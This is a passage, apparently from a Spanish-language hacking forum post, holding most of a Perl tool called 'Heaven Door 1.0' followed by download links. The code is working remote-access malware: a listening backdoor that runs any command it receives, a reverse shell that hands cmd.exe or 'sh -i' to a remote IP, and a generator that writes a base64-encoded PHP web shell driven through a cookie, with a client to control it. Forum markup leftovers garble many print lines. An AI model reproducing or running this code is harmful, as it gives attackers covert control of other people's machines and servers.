    60.  
    61. # Functions
    62.  
    63. # Simple backdoor
    64.  
    65. sub backdoor {
    66.    
    67.    my($port) = @_;
    68.    
    69.    $backdoor = IO::Socket::INET->new(Proto=> 'tcp',LocalPort =>$port,Listen=> SOMAXC,Reuse=> 1);
    70.  
    71.    printear("</li><li type="square"> Heaven_Door : ");[/li][/list]
    72.    print "Online\n";
    73.    printear("</li><li type="square"> Port : ");[/li][/list]
    74.    print "$port\n";
    75.    printear("</li><li type="square"> PID : ");[/li][/list]
    76.    print "$$\n\n";
    77.    
    78.    printear_titulo("</li><li type="square"> Connected");[/li][/list]
    79.  
    80.    while ($jesus = $backdoor->accept()) {
    81.       $jesus->autoflush(1);
    82.       print $jesus "</li><li type="square"> Heaven_Door : Online\n</li><li type="square"> Port : 25256\n</li><li type="square"> PID : ".$$."\n\n";[/li][/list]
    83.       print $jesus "Welcome  ".$jesus->peerhost."\n\n";
    84.       &extras;
    85.       $dir = getcwd();
    86.       print $jesus $dir.">>";
    87.       while (<$jesus>) {
    88.          my $yeah = qx($_);
    89.          print $jesus "\n\n".$yeah."\n\n";
    90.          print $jesus $dir.">>";
    91.       }
    92.    }
    93.  
    94.    sub extras {
    95.  
    96.       if ($^O =~/Win32/ig) {
    97.          use if $^O eq "MSWin32", "Win32";
    98.          print $jesus "</li><li type="square"> Domain Name : ".Win32::DomainName()."\n";[/li][/list]
    99.          print $jesus "</li><li type="square"> OS Version : ".Win32::GetOSName()."\n";[/li][/list]
    100.          print $jesus "</li><li type="square"> Username : ".Win32::LoginName()."\n\n";[/li][/list]
    101.       } else {
    102.          $output =  `uname -a`;
    103.          print $jesus "--==System Info==--\n\n".$output."\n";
    104.       }
    105.    }
    106.    
    107. }
    108.  
    109. #
    110.  
    111. # Reverse Shell
    112.  
    113. sub reverse_shell {
    114.    my($ip,$port) = @_;
    115.    printear_titulo("</li><li type="square"> Reverse Shell : ");[/li][/list]
    116.    print "Loaded\n\n";
    117.    printear("</li><li type="square"> IP to connect : ");[/li][/list]
    118.    print $ip."\n";
    119.    printear("</li><li type="square"> Port : ");[/li][/list]
    120.    print $port."\n\n";
    121.    printear_logo("</li><li type="square"> Connecting ...\n\n");[/li][/list]
    122.    socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    123.    connect(REVERSE, sockaddr_in($port,inet_aton($ip)));
    124.    printear_titulo("</li><li type="square"> Reverse Shell successful\n\n");[/li][/list]
    125.    open (STDIN,">&REVERSE");
    126.    open (STDOUT,">&REVERSE");
    127.    open (STDERR,">&REVERSE");
    128.    tipo();
    129.    printear_logo("</li><li type="square"> Disconnecting ...\n\n");[/li][/list]
    130. }
    131.  
    132. sub tipo {
    133.    if ($^O =~/Win32/ig) {
    134.       infowin();
    135.    system("cmd.exe");
    136.    } else {
    137.       infolinux();
    138.       system("export TERM=xterm;exec sh -i");
    139.    }
    140. }
    141.  
    142. sub infowin {
    143.    use if $^O eq "MSWin32", "Win32";
    144.    print "</li><li type="square"> Domain Name : ".Win32::DomainName()."\n";[/li][/list]
    145.    print "</li><li type="square"> OS Version : ".Win32::GetOSName()."\n";[/li][/list]
    146.    print "</li><li type="square"> Username : ".Win32::LoginName()."\n\n";[/li][/list]
    147. }
    148.  
    149. sub infolinux {
    150.    print "</li><li type="square"> System information\n\n";[/li][/list]
    151.    system("uname -a");
    152.    print "\n";
    153. }
    154.  
    155. #
    156.  
    157. # More Functions
    158.  
    159. sub cargar_consola_backdoor {
    160.    printear("</li><li type="square"> Checking Backdoor ...\n\n");[/li][/list]
    161.    my $check1 = cargar_comando($url,"ver");
    162.    my $check2 = cargar_comando($url,"uname -a");
    163.    if(check_backdoor($check1) or check_backdoor($check2)) {
    164.       printear_logo("</li><li type="square"> Backdoor Loaded\n");[/li][/list]
    165.       my($url) = @_;
    166.       while(1) {
    167.          printear("\n</li><li type="square"> Command : ");[/li][/list]
    168.          chomp( my $comando = <stdin> );
    169.          if ( $comando =~ /exit/ ) {
    170.             copyright();
    171.          }
    172.          my $code = cargar_comando($url,$comando);
    173.          if(check_backdoor($code)) {
    174.             my $output = extract_command_backdoor($code);
    175.             if($output ne "") {
    176.                printear_titulo("\n".$output."\n");
    177.             } else {
    178.                printear_titulo("\n"."[-] Invalid command"."\n");  
    179.             }
    180.          } else {
    181.             printear_titulo("\n"."[-] Invalid command"."\n");
    182.          }
    183.       }
    184.    } else {
    185.       printear_logo("</li><li type="square"> Backdoor not exists\n");[/li][/list]
    186.    }
    187. }
    188.  
    189. sub check_backdoor {
    190.    my $text = shift;
    191.    if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
    192.       return 1;
    193.    } else {
    194.       return 0;
    195.    }
    196. }
    197.  
    198. sub extract_command_backdoor {
    199.    my $text = shift;
    200.    if($text=~/\[code\_heaven\](.*?)\[\/code\_heaven\]/s) {
    201.       return $1;
    202.    } else {
    203.       return "";
    204.    }
    205. }
    206.  
    207. sub cargar_generador_backdoor {
    208.    my $filename = shift;
    209.    if(-f $filename) {
    210.       unlink($filename);
    211.    }
    212.    printear_titulo("</li><li type="square"> Generating backdoor ...\n\n");[/li][/list]
    213.    generar_backdoor($filename);
    214.    if(-f $filename) {
    215.       printear("</li><li type="square"> Backdoor $filename generated !\n");[/li][/list]
    216.    } else {
    217.       printear("[-] Error generating backdoor\n");
    218.    }
    219. }
    220.  
    221. sub generar_backdoor {
    222.    my $filename = shift;
    223.    my $code = "PD9waHAgaWYgKGlzc2V0KCRfQ09PS0lFWyJoZWF2ZW5fZG9vcl9oZXJlIl0pICYmICFlbXB0eSgkX0NPT0tJRVsiaGVhdmVuX2Rvb3JfaGVyZSJdKSkgeyAJJGNvZGUgPSAiIjsgCSRvdXRwdXQgPSAiIjsgCWV4ZWMoJF9DT09LSUVbImhlYXZlbl9kb29yX2hlcmUiXSwkY29kZSk7IAlmb3JlYWNoICgkY29kZSBhcyAkbGluZSkgeyAJCSRvdXRwdXQgPSAkb3V0cHV0IC4gJGxpbmUuIlxuIjsgCX0gCWVjaG8gYmFzZTY0X2VuY29kZSgiW2NvZGVfaGVhdmVuXSIuJG91dHB1dC4iWy9jb2RlX2hlYXZlbl0iKTsgfSA";
    224.    savefile($filename,decode_base64($code));
    225. }
    226.  
    227. sub cargar_comando {
    228.    my($url,$command) = @_;
    229.    my $nave = LWP::UserAgent->new(ssl_opts => {verify_hostname => 0,SSL_verify_mode => IO::Socket::SSL::SSL_VERIFY_NONE});
    230.    $nave->agent("Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0");
    231.    $nave->timeout(10);
    232.    my $contenido = $nave->get($url,Cookie => "heaven_door_here=".$command)->content;
    233.    return decode_base64($contenido);
    234. }
    235.  
    236. sub savefile {
    237.    my ($filename,$text) = @_;
    238.    open( SAVE, ">>" . $filename );
    239.    print SAVE $text . "\n";
    240.    close SAVE;
    241. }
    242.  
    243. sub printear {
    244.     cprint( "\x036" . $_[0] . "\x030" );
    245. }
    246.  
    247. sub printear_logo {
    248.     cprint( "\x037" . $_[0] . "\x030" );
    249. }
    250.  
    251. sub printear_titulo {
    252.     cprint( "\x0310" . $_[0] . "\x030" );
    253. }
    254.  
    255. sub sintax {
    256.  
    257.     printear("</li><li type="square"> Sintax : ");[/li][/list]
    258.     print "perl $0 <option> <value>\n";
    259.     printear("\n</li><li type="square"> Options : \n\n");[/li][/list]
    260.     print "-backdoor -port <port> : Enable backdoor in port\n";
    261.     print "-reverse -ip <ip> -port <port> : Get all tags GPS of a image\n";
    262.     print "-generate_backdoor -filename <filename> : Generate backdoor in filename\n";
    263.     print "-connect_backdoor -url <url> : Connect to backdoor in URL\n";
    264.     printear("\n</li><li type="square"> Example : ");[/li][/list]
    265.     print "perl heaven_door.pl -reverse -ip 127.0.0.1 -port 666\n";
    266.     copyright();
    267. }
    268.  
    269. sub head {
    270.     printear_logo("\n-- == Heaven Door 1.0 == --\n\n\n");
    271. }
    272.  
    273. sub copyright {
    274.     printear_logo("\n\n-- == (C) Doddy Hackman 2016 == --\n\n");
    275.     exit(1);
    276. }
    277.  
    278. #The End ?
    279.  

    Un video con ejemplos de uso :



    Si quieren bajar el programa lo pueden hacer de aca :

    SourceForge.
    Github.

    Eso seria todo.

Páginas: [1] 2 3 ... 28